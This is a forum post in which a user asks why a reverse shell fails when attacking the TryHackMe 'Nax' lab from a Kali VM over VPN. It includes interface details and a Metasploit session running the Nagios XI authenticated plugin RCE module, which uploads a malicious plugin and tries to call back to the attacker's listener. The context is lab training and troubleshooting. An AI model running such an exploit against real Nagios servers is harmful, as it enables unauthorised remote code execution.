Hi everyone,
I have just installed the Kali template and I am testing TryHackMe via OpenVPN.
For 1 purpose, I still need the attackbox, because, even with my vpn connected on my kali vm, I cannot get a reverse shell from the vulnerable server in the lab to my Kali.
Anyone have any experience in this as it is probably obvious (not seeing the forest because of all the trees)
As an example, the lab “Nax” is a nagiosxi server with an RCE and when executing the exploit it just times out. I have tried both my Kali IP-addresses to no avail.:
network:
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:5e:6c:00 brd ff:ff:ff:ff:ff:ff
inet 10.137.0.18/32 brd 10.255.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe5e:6c00/64 scope link
valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.11.58.193/16 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::dfab:5a9d:e2d7:69b3/64 scope link stable-privacy
valid_lft forever preferred_lft forever
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 10.10.20.15
RHOSTS => 10.10.20.15
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD XXXX
PASSWORD => XXXX
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 10.11.58.193
LHOST => 10.11.58.193
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[] Started reverse TCP handler on 10.11.58.193:4444
[] Running automatic check (“set AutoCheck false” to disable)
[] Attempting to authenticate to Nagios XI…
[+] Successfully authenticated to Nagios XI
[] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable.
[] Uploading malicious ‘check_ping’ plugin…
[] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[] Executing plugin…
[] Waiting up to 300 seconds for the plugin to request the final payload…
[] Deleting malicious ‘check_ping’ plugin…
[+] Plugin deleted.
[] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 10.137.0.18
LHOST => 10.137.0.18
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[] Started reverse TCP handler on 10.137.0.18:4444
[] Running automatic check (“set AutoCheck false” to disable)
[] Attempting to authenticate to Nagios XI…
[+] Successfully authenticated to Nagios XI
[] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable.
[] Uploading malicious ‘check_ping’ plugin…
[] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[] Executing plugin…
[] Waiting up to 300 seconds for the plugin to request the final payload…
[] Deleting malicious ‘check_ping’ plugin…
[+] Plugin deleted.
[] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) >